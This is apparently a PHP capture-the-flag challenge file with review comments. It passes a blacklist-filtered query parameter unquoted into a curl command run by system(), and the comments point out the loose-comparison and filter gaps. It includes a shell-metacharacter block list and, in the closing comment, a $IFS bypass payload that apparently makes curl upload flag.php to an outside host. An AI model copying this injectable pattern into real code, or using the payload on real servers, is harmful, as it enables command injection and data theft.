<?php
// error_reporting(E_ALL & ~E_NOTICE); // NOTE(review): the original commented-out line used `||`, a boolean OR that evaluates to true (== 1 == E_ERROR), not the intended bitmask; the bitwise `&` form is what was meant
/**
 * Strip a fixed set of shell metacharacters from $str.
 *
 * This is a character *blacklist*, applied as one str_replace() call over
 * the needles below (each needle is deleted from the whole string, in
 * list order). It is not a shell escaper: characters that are NOT in the
 * list -- for example `$`, `\`, `-`, `.`, `<`, `*` and plain whitespace --
 * pass through untouched, so the result is still unsafe to interpolate
 * into a shell command. Real code should use escapeshellarg() per
 * argument, or avoid the shell entirely.
 *
 * @param string $str raw (untrusted) input
 * @return string $str with every listed character removed
 */
function strreplace($str){
    // Deletion list. ':' was the last entry appended by the original
    // author (the original source marked it with a comment, in Chinese,
    // meaning "add this line").
    $forbidden = [
        '`', ';', '|', '&', '>',
        ')', '(', '{', '}', '%',
        '#', '!', '?', '@', '+',
        '/', ':',
    ];
    return str_replace($forbidden, '', $str);
}
// Challenge entry point. `num` and `cmd` are read straight from the query
// string and reach the checks below without any other validation.
//
// NOTE(review): this is deliberately vulnerable CTF code; do not copy it.
// Two things worth noticing:
//   * `num` is gated twice with different semantics: a byte search for the
//     character '1' (strstr) and a loose `==` comparison against the
//     integer 1, which applies PHP's numeric-string juggling rules.
//   * `cmd` is interpolated, unquoted, into a shell command executed by
//     system() after only the strreplace() character blacklist -- not
//     escapeshellarg().
if ($_GET['num'] != "") {
    $num = $_GET['num'];

    // Any literal '1' in the raw parameter is rejected outright.
    if (strstr($num, '1')) {
        die("Sorry");
    }

    if ($num == 1) {
        echo "Flag in http://127.0.0.1/flag.php</br>";

        // Blacklist-filter the user-supplied curl suffix, echo the resulting
        // command line, then run it. strreplace() leaves `$`, `\`, `-`, `.`,
        // `<` and whitespace intact, and nothing here quotes the string.
        $suffix = strreplace(trim($_GET['cmd']));
        $command = "curl" . $suffix . "/flag.php";
        var_dump($command);
        system($command);
    } else {
        echo "Try to num = 1";
    }
} else {
    echo "It Works!";
}
// Intended payload left by the original author. `$IFS` is expanded by the
// shell to whitespace and none of `$`, `\`, `-`, `.` are in the blacklist;
// the `-x` / `-T` flags appear to hand curl a proxy and an upload target so
// the fetched flag.php is sent to an external host -- TODO confirm against
// the challenge write-up.
//$cmd=$IFS\-x$IFS\wonderkun.cc$IFS\-T$IFS\flag.php$IFS\http
?>